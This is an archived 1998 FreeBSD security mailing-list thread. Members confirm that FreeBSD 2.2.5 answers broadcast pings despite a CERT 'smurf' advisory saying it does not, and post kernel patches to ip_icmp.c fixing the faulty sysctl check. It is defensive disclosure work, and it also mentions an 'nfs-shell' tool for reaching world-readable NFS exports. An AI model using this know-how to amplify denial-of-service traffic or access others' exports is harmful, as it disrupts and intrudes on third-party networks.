Do I feel sorry for Mark Crispin? 8) -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 26 20:18:46 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA01191 for freebsd-security-outgoing; Tue, 26 May 1998 20:18:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dc1.mfn.org (dc1.mfn.org [204.238.179.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id UAA01170 for ; Tue, 26 May 1998 20:18:32 -0700 (PDT) (envelope-from sysadmin@mfn.org) Received: from w3svcs.mfn.org (unverified [204.238.179.11]) by mail.mfn.org (EMWAC SMTPRS 0.83) with SMTP id ; Tue, 26 May 1998 22:08:19 -0500 Received: by w3svcs.mfn.org with Microsoft Mail id <01BD88F2.6DDD3A40@w3svcs.mfn.org>; Tue, 26 May 1998 22:05:44 -0500 Message-ID: <01BD88F2.6DDD3A40@w3svcs.mfn.org> From: "J.A. Terranson" To: "'FreeBSD Security'" Subject: Possible DoS opportunity via ping implementation error? Date: Tue, 26 May 1998 22:05:42 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk I had a very interesting day today! I found out that FBSD (2.2.5R) machines will always respond to a broadcasted echo request. For example: W2>ping 10.1.1.255 PING 10.1.1.255 (10.1.1.255): 56 data bytes 64 bytes from 10.1.1.20: icmp_seq=1 ttl=255 time=4.746 ms 64 bytes from 10.1.1.23: icmp_seq=1 ttl=255 time=45.864 ms (DUP!) lots of these dups... In fact, 1 dup for every FBSD machine on the subnet (interestingly, there were no replies from my NT4.0 boxes...) Since I do not follow the "security" list, please respond directly. Thanks. J.A. Terranson sysadmin@mfn.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 26 20:55:46 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA08789 for freebsd-security-outgoing; Tue, 26 May 1998 20:55:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (dima@burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA08698 for ; Tue, 26 May 1998 20:55:15 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id UAA09157; Tue, 26 May 1998 20:54:41 -0700 (PDT) Message-Id: <199805270354.UAA09157@burka.rdy.com> Subject: Re: imapd_4.1b.txt In-Reply-To: <199805270136.SAA02758@dingo.cdrom.com> from Mike Smith at "May 26, 98 06:36:45 pm" To: mike@smith.net.au (Mike Smith) Date: Tue, 26 May 1998 20:54:41 -0700 (PDT) Cc: dg@root.com, mike@smith.net.au, jflemer@tiger.acsu.k12.vt.us, freebsd-security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Mike Smith writes: > > >Does imapd not run as root from /etc/inetd.conf? The binary is not > > >setuid in the package tarball... > > > > If it is run as root, then the core file will be owned by root with no > > permissions for group or other, so you'd have to be root to read it. > > ... and if it changes UID to manipulate your mail folders, it will no > longer drop a core. Ok, it sounds like the door is closed on that one. > > Do I feel sorry for Mark Crispin? 8) I don't think it will drop core in any case. As far as I know all the inetd stuff runs from the daemon class, and daemon class has coredumpsize 0 by default. > > -- > \\ Sometimes you're ahead, \\ Mike Smith > \\ sometimes you're behind. \\ mike@smith.net.au > \\ The race is long, and in the \\ msmith@freebsd.org > \\ end it's only with yourself. \\ msmith@cdrom.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 26 22:36:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA01098 for freebsd-security-outgoing; Tue, 26 May 1998 22:36:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.actrix.gen.nz (root@mail.actrix.gen.nz [203.96.16.37]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA00984 for ; Tue, 26 May 1998 22:35:48 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from [192.168.1.2] (aniwa.actrix.gen.nz [203.96.56.186]) by mail.actrix.gen.nz (8.8.8/8.8.5) with SMTP id RAA22620; Wed, 27 May 1998 17:35:12 +1200 (NZST) X-Sender: andrew@192.168.1.1 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 27 May 1998 17:37:46 +1200 To: "J.A. Terranson" , "'FreeBSD Security'" From: andrew@squiz.co.nz (Andrew McNaughton) Subject: Re: Possible DoS opportunity via ping implementation error? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk At 3:05 PM 27/5/98, J.A. Terranson wrote: >I had a very interesting day today! I found out that FBSD (2.2.5R) >machines will >always respond to a broadcasted echo request. For example: This contradicts the CERT Advisory below which states that FreeBSD does not have the problem. Either the CERT report is wrong, a problem has been introduced since, or it's specific to the way you've set up your boxes. I'd like to know which. >============================================================================= >CERT* Advisory CA-98.01.smurf >Original issue date: Jan. 05, 1998 >Last revised: -- > >Topic: "smurf" IP Denial-of-Service Attacks >- ----------------------------------------------------------------------------- > >This advisory is intended primarily for network administrators responsible for >router configuration and maintenance. > >The attack described in this advisory is different from the denial-of-service >attacks described in CERT advisory CA-97.28. > >The CERT Coordination Center has received reports from network service >providers (NSPs), Internet service providers (ISPs), and other sites of >continuing denial-of-service attacks involving forged ICMP echo request >packets (commonly known as "ping" packets) sent to IP broadcast >addresses. These attacks can result in large amounts of ICMP echo reply >packets being sent from an intermediary site to a victim, which can cause >network congestion or outages. These attacks have been referred to as "smurf" >attacks because the name of one of the exploit programs attackers use to >execute this attack is called "smurf." >FreeBSD, Inc. >============= >In FreeBSD 2.2.5 and up, the tcp/ip stack does not respond to icmp >echo requests destined to broadcast and multicast addresses by default. This >behaviour can be changed via the sysctl command via >mib net.inet.icmp.bmcastecho. > ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Andrew McNaughton = ++64 4 389 6891 Any sufficiently advanced = andrew@squiz.co.nz bug is indistinguishable = http://www.newsroom.co from a feature. = -- Rich Kulawiec = To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 26 23:00:03 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA05785 for freebsd-security-outgoing; Tue, 26 May 1998 23:00:03 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dc1.mfn.org (dc1.mfn.org [204.238.179.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id WAA05727 for ; Tue, 26 May 1998 22:59:36 -0700 (PDT) (envelope-from sysadmin@mfn.org) Received: from w3svcs.mfn.org (unverified [204.238.179.11]) by mail.mfn.org (EMWAC SMTPRS 0.83) with SMTP id ; Wed, 27 May 1998 00:59:56 -0500 Received: by w3svcs.mfn.org with Microsoft Mail id <01BD890A.669F8310@w3svcs.mfn.org>; Wed, 27 May 1998 00:57:20 -0500 Message-ID: <01BD890A.669F8310@w3svcs.mfn.org> From: "J.A. Terranson" To: "'Andrew McNaughton'" , "'FreeBSD Security'" Subject: RE: Possible DoS opportunity via ping implementation error? Date: Wed, 27 May 1998 00:57:18 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk I am running fairly plain-jane FBSD 2.2.5 from FTP.FREEBSD.ORG... CERT is *wrong* J.A. Terranson sysadmin@mfn.org -----Original Message----- From: Andrew McNaughton [SMTP:andrew@squiz.co.nz] Sent: Wednesday, May 27, 1998 12:38 AM To: J.A. Terranson; 'FreeBSD Security' Subject: Re: Possible DoS opportunity via ping implementation error? At 3:05 PM 27/5/98, J.A. Terranson wrote: >I had a very interesting day today! I found out that FBSD (2.2.5R) >machines will >always respond to a broadcasted echo request. For example: This contradicts the CERT Advisory below which states that FreeBSD does not have the problem. Either the CERT report is wrong, a problem has been introduced since, or it's specific to the way you've set up your boxes. I'd like to know which. >============================================================================= >CERT* Advisory CA-98.01.smurf >Original issue date: Jan. 05, 1998 >Last revised: -- > >Topic: "smurf" IP Denial-of-Service Attacks > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 26 23:48:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA14004 for freebsd-security-outgoing; Tue, 26 May 1998 23:48:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.actrix.gen.nz (root@mail.actrix.gen.nz [203.96.16.37]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA13868 for ; Tue, 26 May 1998 23:47:38 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from [192.168.1.2] (aniwa.actrix.gen.nz [203.96.56.186]) by mail.actrix.gen.nz (8.8.8/8.8.5) with SMTP id SAA28188; Wed, 27 May 1998 18:47:10 +1200 (NZST) X-Sender: andrew@192.168.1.1 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 27 May 1998 18:49:45 +1200 To: "J.A. Terranson" , "'FreeBSD Security'" From: andrew@squiz.co.nz (Andrew McNaughton) Subject: RE: Possible DoS opportunity via ping implementation error? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk At 5:57 PM 27/5/98, J.A. Terranson wrote: >I am running fairly plain-jane FBSD 2.2.5 from FTP.FREEBSD.ORG... > >CERT is *wrong* > >J.A. Terranson >sysadmin@mfn.org Now confirmed here also pining from my mac, which has the same problem. CERT and BugTRAQ should be notified. Not sure if this should wait for a patch to be issued. Andrew. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Andrew McNaughton = ++64 4 389 6891 Any sufficiently advanced = andrew@squiz.co.nz bug is indistinguishable = http://www.newsroom.co from a feature. = -- Rich Kulawiec = To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 00:19:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA20460 for freebsd-security-outgoing; Wed, 27 May 1998 00:19:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dc1.mfn.org (dc1.mfn.org [204.238.179.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id AAA20420 for ; Wed, 27 May 1998 00:18:54 -0700 (PDT) (envelope-from sysadmin@mfn.org) Received: from w3svcs.mfn.org (unverified [204.238.179.11]) by mail.mfn.org (EMWAC SMTPRS 0.83) with SMTP id ; Wed, 27 May 1998 02:19:09 -0500 Received: by w3svcs.mfn.org with Microsoft Mail id <01BD8915.776B6F50@w3svcs.mfn.org>; Wed, 27 May 1998 02:16:32 -0500 Message-ID: <01BD8915.776B6F50@w3svcs.mfn.org> From: "J.A. Terranson" To: "'FreeBSD Security'" Subject: SMURF in 2.2.5 Date: Wed, 27 May 1998 02:16:31 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk I assume you guys have been following the thread... I will not report this to bugtraq untill you guys tell me there's a patch... J.A. Terranson sysadmin@mfn.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 00:53:15 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA26147 for freebsd-security-outgoing; Wed, 27 May 1998 00:53:15 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from kremvax.demos.su (kremvax.demos.su [194.87.0.20]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id AAA26050 for ; Wed, 27 May 1998 00:52:38 -0700 (PDT) (envelope-from sinbin.demos.su!bag@kremvax.demos.su) Received: by kremvax.demos.su (8.6.13/D) from 0@sinbin.demos.su [194.87.5.31] with ESMTP id LAA21116; Wed, 27 May 1998 11:48:49 +0400 Received: by sinbin.demos.su id LAA23285; (8.6.12/D) Wed, 27 May 1998 11:48:19 +0400 From: bag@sinbin.demos.su (Alex G. Bulushev) Message-Id: <199805270748.LAA23285@sinbin.demos.su> Subject: Re: Possible DoS opportunity via ping implementation error? In-Reply-To: from "Andrew McNaughton" at "May 27, 98 05:37:46 pm" X-ELM-OSV: (Our standard violations) no-mime=1; no-hdr-encoding=1 To: andrew@squiz.co.nz (Andrew McNaughton) Date: Wed, 27 May 1998 11:48:19 +0400 (MSD) Cc: sysadmin@mfn.org, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL32 (25)] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > At 3:05 PM 27/5/98, J.A. Terranson wrote: > >I had a very interesting day today! I found out that FBSD (2.2.5R) > >machines will > >always respond to a broadcasted echo request. For example: > > This contradicts the CERT Advisory below which states that FreeBSD does not > have the problem. > > Either the CERT report is wrong, a problem has been introduced since, or > it's specific to the way you've set up your boxes. CERT report is wrong i check -current (Apr 23) and found that it respond to broadcast ping, default net.inet.icmp.bmcastecho=1, but it alsow respond to broadcast after sysctl -w net.inet.icmp.bmcastecho=0 the good news is that in both case it not respond from aliases :) Alex. > > I'd like to know which. > > > > > > >============================================================================= > >CERT* Advisory CA-98.01.smurf > >Original issue date: Jan. 05, 1998 > >Last revised: -- > > > >Topic: "smurf" IP Denial-of-Service Attacks > >- ----------------------------------------------------------------------------- > > > >This advisory is intended primarily for network administrators responsible for > >router configuration and maintenance. > > > >The attack described in this advisory is different from the denial-of-service > >attacks described in CERT advisory CA-97.28. > > > >The CERT Coordination Center has received reports from network service > >providers (NSPs), Internet service providers (ISPs), and other sites of > >continuing denial-of-service attacks involving forged ICMP echo request > >packets (commonly known as "ping" packets) sent to IP broadcast > >addresses. These attacks can result in large amounts of ICMP echo reply > >packets being sent from an intermediary site to a victim, which can cause > >network congestion or outages. These attacks have been referred to as "smurf" > >attacks because the name of one of the exploit programs attackers use to > >execute this attack is called "smurf." > > > >FreeBSD, Inc. > >============= > >In FreeBSD 2.2.5 and up, the tcp/ip stack does not respond to icmp > >echo requests destined to broadcast and multicast addresses by default. This > >behaviour can be changed via the sysctl command via > >mib net.inet.icmp.bmcastecho. > > > > ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ > Andrew McNaughton = > ++64 4 389 6891 Any sufficiently advanced = > andrew@squiz.co.nz bug is indistinguishable = > http://www.newsroom.co from a feature. = > -- Rich Kulawiec = > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 01:50:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA07001 for freebsd-security-outgoing; Wed, 27 May 1998 01:50:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from pollux.or.signature.nl (pollux.or.signature.nl [194.229.138.194]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA06983 for ; Wed, 27 May 1998 01:50:28 -0700 (PDT) (envelope-from bit@signature.nl) Received: from localhost (bit@localhost) by pollux.or.signature.nl (8.8.7/bs) with SMTP id KAA29617; Wed, 27 May 1998 10:50:05 +0200 (MET DST) Date: Wed, 27 May 1998 10:50:05 +0200 (MET DST) From: Bart Smit X-Sender: bit@pollux.or.signature.nl To: "J.A. Terranson" cc: "'FreeBSD Security'" Subject: Re: SMURF in 2.2.5 In-Reply-To: <01BD8915.776B6F50@w3svcs.mfn.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Wed, 27 May 1998, J.A. Terranson wrote: > I will not report this to bugtraq untill you guys tell me there's > a patch... Well, sysctl -w net.inet.icmp.bmcastecho=0 does not help, contrary to what you'd expect from the advisory... --Bart To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 02:55:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA19208 for freebsd-security-outgoing; Wed, 27 May 1998 02:55:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA19200 for ; Wed, 27 May 1998 02:55:12 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199805270955.CAA19200@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA076192871; Wed, 27 May 1998 19:54:31 +1000 From: Darren Reed Subject: Re: possible problem with portmap To: spork@super-g.com (spork) Date: Wed, 27 May 1998 19:54:31 +1000 (EST) Cc: mike@smith.net.au, paul@mu.org, freebsd-security@FreeBSD.ORG In-Reply-To: from "spork" at May 26, 98 11:36:50 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk In some mail from spork, sie said: > > Did anyone quite understand the "nfs-shell" thread on bugtraq? It was > discussed shortly after the portmap DoS thread. From what I could gather > you could get an interactive shell via nfs?? Yup. That program was first written in 1991...there are at least two variations on it. It is very useful for doing things like ftp via NFS from an ftp server that has world exports for read on which you don't have an account and when you're not root. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 03:39:44 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA28231 for freebsd-security-outgoing; Wed, 27 May 1998 03:39:44 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id DAA28210 for ; Wed, 27 May 1998 03:39:34 -0700 (PDT) (envelope-from sthaug@nethelp.no) From: sthaug@nethelp.no Received: (qmail 9795 invoked by uid 1001); 27 May 1998 10:39:30 +0000 (GMT) To: bag@sinbin.demos.su Cc: andrew@squiz.co.nz, sysadmin@mfn.org, freebsd-security@FreeBSD.ORG Subject: Re: Possible DoS opportunity via ping implementation error? In-Reply-To: Your message of "Wed, 27 May 1998 11:48:19 +0400 (MSD)" References: <199805270748.LAA23285@sinbin.demos.su> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Wed, 27 May 1998 12:39:30 +0200 Message-ID: <9793.896265570@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > > >I had a very interesting day today! I found out that FBSD (2.2.5R) > > >machines will > > >always respond to a broadcasted echo request. For example: > > > > This contradicts the CERT Advisory below which states that FreeBSD does not > > have the problem. > > > > Either the CERT report is wrong, a problem has been introduced since, or > > it's specific to the way you've set up your boxes. > > CERT report is wrong > i check -current (Apr 23) and found that it respond to broadcast ping, > default net.inet.icmp.bmcastecho=1, but it alsow respond to broadcast > after sysctl -w net.inet.icmp.bmcastecho=0 > the good news is that in both case it not respond from aliases :) The problematic code is the following, from the icmp_input() routine in sys/netinet/ip_icmp.c: case ICMP_ECHO: if (!icmpbmcastecho && (m->m_flags & (M_MCAST | M_BCAST)) != 0 && IN_MULTICAST(ntohl(ip->ip_dst.s_addr))) { icmpstat.icps_bmcastecho++; break; } icp->icmp_type = ICMP_ECHOREPLY; goto reflect; The icmpbmcastecho variable is set according to net.inet.icmp.bmcastecho. I guess setting net.inet.icmp.bmcastecho=0 is *meant* to turn off both multicast and broadcast echo, however, this line && IN_MULTICAST(ntohl(ip->ip_dst.s_addr))) { only tests on whether the destination address is a multicast address (ie. class D), when in reality it also needs to test whether it's one of the acceptable broadcast addresses for this host (ie. all ones, for every interface: all ones in host part, all zeros in host part, etc). Such a test is done by the in_broadcast() routine in sys/netinet/in.c. I found it just as logical to simply remove the whole test, but I'll let somebody else decide on whether this is the correct fix. I also changed the initialization of the icmpbmcastecho variable, so it now defaults to off (no multicast/broadcast echo). The following patch is against 2.2-980506-SNAP (ip_icmp.c,v 1.22.2.2), but should work equally well against FreeBSD-current. Late breaking news: I just checked -current on ftp.cdrom.com, and it now has the IN_MULTICAST test removed. Still initializes icmpbmcastecho to 1, though. I think it *should* default to 0 (off). Steinar Haug, Nethelp consulting, sthaug@nethelp.no ---------------------------------------------------------------------- *** ip_icmp.c.orig Mon Aug 25 18:33:02 1997 --- ip_icmp.c Wed May 27 12:20:55 1998 *************** *** 71,77 **** SYSCTL_INT(_net_inet_icmp, ICMPCTL_MASKREPL, maskrepl, CTLFLAG_RW, &icmpmaskrepl, 0, ""); ! static int icmpbmcastecho = 1; SYSCTL_INT(_net_inet_icmp, OID_AUTO, bmcastecho, CTLFLAG_RW, &icmpbmcastecho, 0, ""); --- 71,77 ---- SYSCTL_INT(_net_inet_icmp, ICMPCTL_MASKREPL, maskrepl, CTLFLAG_RW, &icmpmaskrepl, 0, ""); ! static int icmpbmcastecho = 0; SYSCTL_INT(_net_inet_icmp, OID_AUTO, bmcastecho, CTLFLAG_RW, &icmpbmcastecho, 0, ""); *************** *** 377,384 **** case ICMP_ECHO: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0 ! && IN_MULTICAST(ntohl(ip->ip_dst.s_addr))) { icmpstat.icps_bmcastecho++; break; } --- 377,383 ---- case ICMP_ECHO: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0) { icmpstat.icps_bmcastecho++; break; } *************** *** 387,394 **** case ICMP_TSTAMP: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0 ! && IN_MULTICAST(ntohl(ip->ip_dst.s_addr))) { icmpstat.icps_bmcasttstamp++; break; } --- 386,392 ---- case ICMP_TSTAMP: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0) { icmpstat.icps_bmcasttstamp++; break; } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 08:21:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA18142 for freebsd-security-outgoing; Wed, 27 May 1998 08:21:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA18065 for ; Wed, 27 May 1998 08:21:07 -0700 (PDT) (envelope-from benedict@echonyc.com) Received: from localhost (benedict@localhost) by echonyc.com (8.8.7/8.8.7) with SMTP id LAA15631; Wed, 27 May 1998 11:20:38 -0400 (EDT) Date: Wed, 27 May 1998 11:20:37 -0400 (EDT) From: Snob Art Genre Reply-To: ben@rosengart.com To: "J.A. Terranson" cc: "'FreeBSD Security'" Subject: Re: Possible DoS opportunity via ping implementation error? In-Reply-To: <01BD88F2.6DDD3A40@w3svcs.mfn.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Tue, 26 May 1998, J.A. Terranson wrote: > I had a very interesting day today! I found out that FBSD (2.2.5R) > machines will always respond to a broadcasted echo request. For > example: > > W2>ping 10.1.1.255 > PING 10.1.1.255 (10.1.1.255): 56 data bytes > 64 bytes from 10.1.1.20: icmp_seq=1 ttl=255 time=4.746 ms > 64 bytes from 10.1.1.23: icmp_seq=1 ttl=255 time=45.864 ms (DUP!) > lots of these dups... I've always found this useful, for when I want to build a complete ARP cache for the local network. I use it with NeXTStep all the time. Perhaps the behavior should be modified to respond to broadcast pings iff they're from a directly connected network, otherwise ignore? Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 08:21:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA18261 for freebsd-security-outgoing; Wed, 27 May 1998 08:21:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from implode.root.com (implode.root.com [198.145.90.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA18140 for ; Wed, 27 May 1998 08:21:24 -0700 (PDT) (envelope-from root@implode.root.com) Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.5/8.8.5) with ESMTP id IAA07595; Wed, 27 May 1998 08:21:23 -0700 (PDT) Message-Id: <199805271521.IAA07595@implode.root.com> To: Bart Smit cc: "J.A. Terranson" , "'FreeBSD Security'" Subject: Re: SMURF in 2.2.5 In-reply-to: Your message of "Wed, 27 May 1998 10:50:05 +0200." From: David Greenman Reply-To: dg@root.com Date: Wed, 27 May 1998 08:21:23 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk >On Wed, 27 May 1998, J.A. Terranson wrote: > >> I will not report this to bugtraq untill you guys tell me there's >> a patch... > >Well, sysctl -w net.inet.icmp.bmcastecho=0 does not help, contrary to >what you'd expect from the advisory... That's because the logic for it was broken in the kernel. I just fixed it yesterday. Diff attached (line numbers in -stable will vary slightly). -DG David Greenman Co-founder/Principal Architect, The FreeBSD Project Index: ip_icmp.c =================================================================== RCS file: /home/ncvs/src/sys/netinet/ip_icmp.c,v retrieving revision 1.29 retrieving revision 1.30 diff -c -r1.29 -r1.30 *** ip_icmp.c 1997/08/25 16:29:27 1.29 --- ip_icmp.c 1998/05/26 11:34:30 1.30 *************** *** 375,382 **** case ICMP_ECHO: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0 ! && IN_MULTICAST(ntohl(ip->ip_dst.s_addr))) { icmpstat.icps_bmcastecho++; break; } --- 375,381 ---- case ICMP_ECHO: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0) { icmpstat.icps_bmcastecho++; break; } *************** *** 385,392 **** case ICMP_TSTAMP: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0 ! && IN_MULTICAST(ntohl(ip->ip_dst.s_addr))) { icmpstat.icps_bmcasttstamp++; break; } --- 384,390 ---- case ICMP_TSTAMP: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0) { icmpstat.icps_bmcasttstamp++; break; } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 08:25:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA19484 for freebsd-security-outgoing; Wed, 27 May 1998 08:25:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from implode.root.com (implode.root.com [198.145.90.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA19437 for ; Wed, 27 May 1998 08:25:32 -0700 (PDT) (envelope-from root@implode.root.com) Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.5/8.8.5) with ESMTP id IAA07609; Wed, 27 May 1998 08:24:56 -0700 (PDT) Message-Id: <199805271524.IAA07609@implode.root.com> To: sthaug@nethelp.no cc: bag@sinbin.demos.su, andrew@squiz.co.nz, sysadmin@mfn.org, freebsd-security@FreeBSD.ORG Subject: Re: Possible DoS opportunity via ping implementation error? In-reply-to: Your message of "Wed, 27 May 1998 12:39:30 +0200." <9793.896265570@verdi.nethelp.no> From: David Greenman Reply-To: dg@root.com Date: Wed, 27 May 1998 08:24:56 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk >off (no multicast/broadcast echo). The following patch is against >2.2-980506-SNAP (ip_icmp.c,v 1.22.2.2), but should work equally well >against FreeBSD-current. > >Late breaking news: I just checked -current on ftp.cdrom.com, and it >now has the IN_MULTICAST test removed. Still initializes icmpbmcastecho >to 1, though. I think it *should* default to 0 (off). I noticed the bug last week when cdrom.com was the target of a smurf attack. It took a few days to get Garrett's opinion on how to fix it, and I committed the fix yesterday. -DG David Greenman Co-founder/Principal Architect, The FreeBSD Project To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 09:05:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA28460 for freebsd-security-outgoing; Wed, 27 May 1998 09:05:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA28444 for ; Wed, 27 May 1998 09:05:12 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com) Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id MAA00567 for ; Wed, 27 May 1998 12:04:51 -0400 (EDT) Received: from brain.zeus.leitch.com 